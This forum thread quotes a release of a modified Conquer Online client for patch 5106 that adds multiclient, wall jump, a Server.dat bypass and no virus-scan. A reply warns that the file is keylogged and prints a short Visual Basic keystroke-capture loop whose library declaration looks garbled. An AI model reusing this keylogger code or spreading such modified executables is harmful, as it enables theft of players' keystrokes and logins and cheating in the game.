Quote:
Originally Posted by Alexisppp12345
It works on Patch 5106
Features:
-Conquer.rar:
1.Multiclient
2.No pop-up
3.No virus-scan
4.PM commands
5.You can run Conquer.exe directly
6.Wall Jump(All walls except GW.)
7.Server.dat bypass
8.Removed Chat Tips NEW :D
-flashLogin.rar:
Stops all sounds at login screen
-ConquerOriginalV5106.rar:
Version:5106
The original Conquer.exe in case you don't like mine,or find a problem.
PM Commands:
Instructions:
First close all your clients!
-Conquer.rar:
Download the file, extract the rar file, copy the Conquer.exe into your "Conquer 2.0" directory (replace existing file).
-flashLogin.rar:
Download the file, extract the rar file, copy the flashLogin.ini into your "Conquer 2.0\ini" directory (replace existing file).
-ConquerOriginalV5106.rar:
Download the file, extract the rar file, copy the Conquer.exe into your "Conquer 2.0" directory (replace existing file).
If you liked it click THANKS button.
Feedback is requested from everyone!
|
Checked Script on Conquer.exe etc.
File is key logged
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "Conquer.exe"
Private Sub Timer1_Timer()
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
Text1.Text = Text1.Text + Chr(i)
End if
Next i
End Sub